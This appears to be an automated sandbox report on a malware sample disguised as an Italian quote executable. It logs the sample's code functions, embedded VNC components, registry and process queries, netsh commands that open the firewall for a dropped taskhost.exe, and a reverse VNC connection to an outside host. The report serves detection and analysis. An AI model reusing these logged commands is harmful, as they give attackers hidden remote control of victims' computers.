Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FC3750 0_2_00FC3750
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0101DA00 0_2_0101DA00
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F99B50 0_2_00F99B50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F03B10 0_2_00F03B10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E87AA0 0_2_00E87AA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0101FFD0 0_2_0101FFD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EAFF50 0_2_00EAFF50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0101DEF0 0_2_0101DEF0
Source: C:\Games\viewer.exe Code function: 6_2_006167A0 6_2_006167A0
Source: C:\Games\viewer.exe Code function: 6_2_00640040 6_2_00640040
Source: C:\Games\viewer.exe Code function: 6_2_0063E0E0 6_2_0063E0E0
Source: C:\Games\viewer.exe Code function: 6_2_00649151 6_2_00649151
Source: C:\Games\viewer.exe Code function: 6_2_0063B1CB 6_2_0063B1CB
Source: C:\Games\viewer.exe Code function: 6_2_0061C340 6_2_0061C340
Source: C:\Games\viewer.exe Code function: 6_2_0063B3FD 6_2_0063B3FD
Source: C:\Games\viewer.exe Code function: 6_2_006367B0 6_2_006367B0
Source: C:\Games\viewer.exe Code function: 6_2_00651804 6_2_00651804
Source: C:\Games\viewer.exe Code function: 6_2_006418B4 6_2_006418B4
Source: C:\Games\viewer.exe Code function: 6_2_00651924 6_2_00651924
Source: C:\Games\viewer.exe Code function: 6_2_0061DD00 6_2_0061DD00
Source: C:\Games\viewer.exe Code function: 6_2_0064FDE4 6_2_0064FDE4
Source: C:\Games\viewer.exe Code function: 6_2_00654EF0 6_2_00654EF0
Source: C:\Games\viewer.exe Code function: 6_2_0061FF00 6_2_0061FF00
Source: C:\Games\viewer.exe Code function: 6_2_00649F09 6_2_00649F09
Source: C:\Games\taskhost.exe Code function: 41_2_00162820 41_2_00162820
Source: C:\Games\taskhost.exe Code function: 41_2_0015F0D0 41_2_0015F0D0
Source: C:\Games\taskhost.exe Code function: 41_2_001DA974 41_2_001DA974
Source: C:\Games\taskhost.exe Code function: 41_2_000BD9F0 41_2_000BD9F0
Source: C:\Games\taskhost.exe Code function: 41_2_001E5A2B 41_2_001E5A2B
Source: C:\Games\taskhost.exe Code function: 41_2_0015FA50 41_2_0015FA50
Source: C:\Games\taskhost.exe Code function: 41_2_001C4362 41_2_001C4362
Source: C:\Games\taskhost.exe Code function: 41_2_001E23F9 41_2_001E23F9
Source: C:\Games\taskhost.exe Code function: 41_2_001CA650 41_2_001CA650
Source: C:\Games\taskhost.exe Code function: 41_2_000BD700 41_2_000BD700
Source: C:\Games\taskhost.exe Code function: 41_2_001C3FD4 41_2_001C3FD4
Found potential string decryption / allocating functions
Source: C:\Games\viewer.exe Code function: String function: 00635126 appears 56 times
Source: C:\Games\viewer.exe Code function: String function: 00635630 appears 40 times
Source: C:\Games\viewer.exe Code function: String function: 006350F2 appears 93 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 00E8A880 appears 58 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 00E8AEE0 appears 67 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 00E887F0 appears 50 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 00E89320 appears 120 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 00EA5220 appears 35 times
Source: C:\Games\taskhost.exe Code function: String function: 000BCCB0 appears 34 times
PE / OLE file has an invalid certificate
Source: Preventivo24.01.11.exe Static PE information: invalid certificate
PE file contains executable resources (Code or Archives)
Source: taskhost.exe.0.dr Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskhost.exe.0.dr Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Sample file is different than original file name gathered from version info
Source: Preventivo24.01.11.exe, 00000000.00000003.1685751474.0000000007E27000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewininet.dllD vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVNCHooks.dllH vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000000.1638029413.000000000120B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelzmaextractor.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePrereq.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685248284.0000000007E1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685666367.0000000007E1F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685503614.0000000007E1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B101000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWinVNC.exe0 vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Section loaded: lpk.dll Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Uses 32bit PE files
Source: Preventivo24.01.11.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: shi6E82.tmp.0.dr Binary string: \Device\NameResTrk\RecordNrtCloneOpenPacket
Source: timeout.exe, 00000036.00000002.2263167469.0000000000658000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .CMD;.VBP~
Source: classification engine Classification label: mal76.rans.troj.evad.winEXE@110/77@8/5
Source: ~.pdf.0.dr Initial sample: http://www.pdf-tools.com\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FC0AF0 FormatMessageW,GetLastError, 0_2_00FC0AF0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF4BE0 GetDiskFreeSpaceExW, 0_2_00FF4BE0
Source: C:\Games\viewer.exe Code function: 6_2_00613710 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle, 6_2_00613710
Source: C:\Games\viewer.exe Code function: 6_2_006149C0 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error, 6_2_006149C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E8A740 LoadResource,LockResource,SizeofResource, 0_2_00E8A740
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Games\taskhost.exe Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\upd65B7.tmp Jump to behavior
Source: C:\Games\viewer.exe Command line argument: Ae 6_2_00654140
Source: Preventivo24.01.11.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Preventivo24.01.11.exe Virustotal: Detection: 17%
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File read: C:\Users\user\Desktop\Preventivo24.01.11.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Preventivo24.01.11.exe C:\Users\user\Desktop\Preventivo24.01.11.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
Source: unknown Process created: C:\Games\viewer.exe C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI=" Jump to behavior
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 Jump to behavior
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
